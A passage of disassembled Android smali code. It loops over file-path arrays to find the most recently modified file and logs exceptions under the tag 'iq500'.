    invoke-virtual/range {v38 .. v39}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v38

    const-string v39, "///n"

    invoke-virtual/range {v38 .. v39}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v38

    invoke-virtual/range {v38 .. v38}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v38

    move-object/from16 v24, v38

    .line 149
    :cond_5cf
    add-int/lit8 v25, v25, 0x1

    goto/16 :goto_17e

    .line 152
    :cond_5d3
    const/16 v38, 0x1

    goto/16 :goto_4e7

    .line 172
    :cond_5d7
    move-wide/from16 v38, v29

    move-wide/from16 v34, v38

    .line 173
    move-wide/from16 v38, v29

    new-instance v40, Ljava/io/File;

    move-object/from16 v46, v40

    move-object/from16 v40, v46

    move-object/from16 v41, v46

    move-object/from16 v42, v25

    move/from16 v43, v33

    aget-object v42, v42, v43

    invoke-direct/range {v41 .. v42}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    invoke-virtual/range {v40 .. v40}, Ljava/io/File;->lastModified()J

    move-result-wide v40

    invoke-static/range {v38 .. v41}, Ljava/lang/Math;->max(JJ)J

    move-result-wide v38

    move-wide/from16 v29, v38

    .line 174
    move-wide/from16 v38, v34

    move-wide/from16 v40, v29

    cmp-long v38, v38, v40

    if-eqz v38, :cond_608

    .line 175
    move-object/from16 v38, v25

    move/from16 v39, v33

    aget-object v38, v38, v39

    move-object/from16 v27, v38

    .line 170
    :cond_608
    add-int/lit8 v33, v33, 0x1

    goto/16 :goto_1bf

    .line 180
    :cond_60c
    move-wide/from16 v38, v31

    move-wide/from16 v34, v38

    .line 181
    move-wide/from16 v38, v31

    new-instance v40, Ljava/io/File;

    move-object/from16 v46, v40

    move-object/from16 v40, v46

    move-object/from16 v41, v46

    move-object/from16 v42, v26

    move/from16 v43, v33

    aget-object v42, v42, v43

    invoke-direct/range {v41 .. v42}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    invoke-virtual/range {v40 .. v40}, Ljava/io/File;->lastModified()J

    move-result-wide v40

    invoke-static/range {v38 .. v41}, Ljava/lang/Math;->max(JJ)J

    move-result-wide v38

    move-wide/from16 v31, v38

    .line 182
    move-wide/from16 v38, v34

    move-wide/from16 v40, v31

    cmp-long v38, v38, v40

    if-eqz v38, :cond_63d

    .line 183
    move-object/from16 v38, v26

    move/from16 v39, v33

    aget-object v38, v38, v39
    :try_end_63b
    .catch Ljava/lang/Exception; {:try_start_e4 .. :try_end_63b} :catch_641

    move-object/from16 v28, v38

    .line 178
    :cond_63d
    add-int/lit8 v33, v33, 0x1

    goto/16 :goto_1d2

    .line 221
    :catch_641
    move-exception v38

    move-object/from16 v14, v38

    .line 227
    move-object/from16 v38, v14

    :try_start_646
    invoke-virtual/range {v38 .. v38}, Ljava/lang/Exception;->printStackTrace()V

    .line 228
    const-string v38, "iq500"

    move-object/from16 v39, v14

    invoke-virtual/range {v39 .. v39}, Ljava/lang/Exception;->toString()Ljava/lang/String;

    move-result-object v39

    invoke-static/range {v38 .. v39}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
    :try_end_654
    .catch Ljava/lang/Exception; {:try_start_646 .. :try_end_654} :catch_657

    move-result v38

    goto/16 :goto_2b3

    :catch_657
    move-exception v38

    move-object/from16 v4, v38

    .line 232
    move-object/from16 v38, v4

    invoke-virtual/range {v38 .. v38}, Ljava/lang/Exception;->printStackTrace()V

    .line 233
    const-string v38, "iq500"

    move-object/from16 v39, v4

    invoke-virtual/range {v39 .. v39}, Ljava/lang/Exception;->toString()Ljava/lang/String;

    move-result-object v39

    invoke-static/range {v38 .. v39}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I

    move-result v38

    goto/16 :goto_2b3
.end method